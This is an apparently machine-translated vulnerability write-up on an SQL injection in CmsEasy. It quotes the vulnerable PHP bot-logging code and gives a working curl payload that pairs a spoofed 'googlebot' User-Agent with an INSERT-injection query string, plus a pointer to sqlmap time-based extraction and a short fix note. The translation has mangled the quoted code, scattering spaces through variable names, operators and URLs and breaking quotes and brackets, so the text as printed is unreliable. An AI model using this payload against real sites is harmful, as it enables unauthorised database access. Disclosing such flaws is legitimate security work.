CmsEasy Latest Version foreground SQL injection (2)

I have tried a PHP source code audit tool over the past few days. It is not targeted when it matches some preliminary rules. Thanks to CmsEasy ~ Or INSERT injection./index. php has a stats: getbot (); what is this method doing? /Lib/table/stats. php

Public static function getbot () {$ ServerName = $ _ SERVER ["SERVER_NAME"]; $ ServerPort =$ _ SERVER ["SERVER_PORT"]; $ ScriptName = $ _ SERVER ["SCRIPT_NAME"]; $ QueryString = $ _ SERVER ["QUERY_STRING"]; $ serverip = $ _ SERVER ["REMOTE_ADDR"]; $ GetLocationURL = self: geturl (); $ agent1 = $ _ SERVER ["HTTP_USER_AGENT"]; $ agent = strtolower ($ agent1); $ Bot = ""; if (strpos ($ agent, "googlebot")>-1) {$ Bot = "Google";} if (strpos ($ Agent, "mediapartners-google")>-1) {$ Bot = "Google Adsense";} if (strpos ($ agent, "baiduspider")>-1) {$ Bot = "Baidu";} if (strpos ($ agent, "sogou")>-1) {$ Bot = "Sogou";} if (strpos ($ agent, "yahoo")>-1) {$ Bot = "Yahoo! ";}If (strpos ($ agent," msn ")>-1) {$ Bot =" MSN ";}if (strpos ($ agent," soso ")> -1) {$ Bot = "Soso";} if (strpos ($ agent, "iaarchiver")>-1) {$ Bot = "Alexa ";} if (strpos ($ agent, "sohu")>-1) {$ Bot = "Sohu";} if (strpos ($ agent, "sqworm")>-1) {$ Bot = "AOL";} if (strpos ($ agent, "yodaobot")>-1) {$ Bot = "Yodao";} if (strpos ($ agent, "iaskspider")>-1) {$ Bot = "Iask";} if (strlen ($ Bot)> 0 &&! Front: get ('admin _ dir') {$ stats = self: getInstance (); $ insert = $ stats-> rec_insert (array ('bot '=> $ bot, 'url' => $ GetLocationURL, 'IP' => $ serverip, 'time' => date ('Y-m-d H: I: s'); // This $ GetLocationURL is self:: geturl (); obtained }}

 

Check the geturl () method:

Public static function geturl () {if (! Empty ($ _ SERVER ["REQUEST_URI"]) {// obviously, it is obtained from REQUEST_URI. Yes, this bypasses filtering, for the filtering method, see/lib/tool/front_class.php for about 328 rows $ scrtName = $ _ SERVER ["REQUEST_URI"]; $ nowurl = $ scrtName ;} else {$ scrtName = $ _ SERVER ["PHP_SELF"]; if (empty ($ _ SERVER ["QUERY_STRING"]) {$ nowurl = $ scrtName ;} else {$ nowurl = $ scrtName. "? ". $ _ SERVER ["QUERY_STRING"] ;}} return (isset ($ _ SERVER ["HTTPS"]) & $ _ SERVER ["HTTPS"] = "on ")? 'Https: // ': 'http: //'. $ _ SERVER ['HTTP _ host']. $ nowurl ;}

 

REQUEST_URI does not automatically urldecode once, but the new browser will automatically encode the code. Therefore, the curl is optimal in the command line: for example: curl-A "this is googlebot" "http: // localhost/test/CmsEasy/index. php? A = ', '', '2014-1-1-1'), (database (), '2" CmsEasy no error by default, this is good, therefore, the sqlmap latency is required for obtaining the point data. Of course, the above process is supplemented after the injection point is found... directly scanned by REQUEST_URI and HTTP_USER_AGENT Solution:It is recommended that you perform similar filtering in the DB processing class, or strictly check that it is not in the GPC area.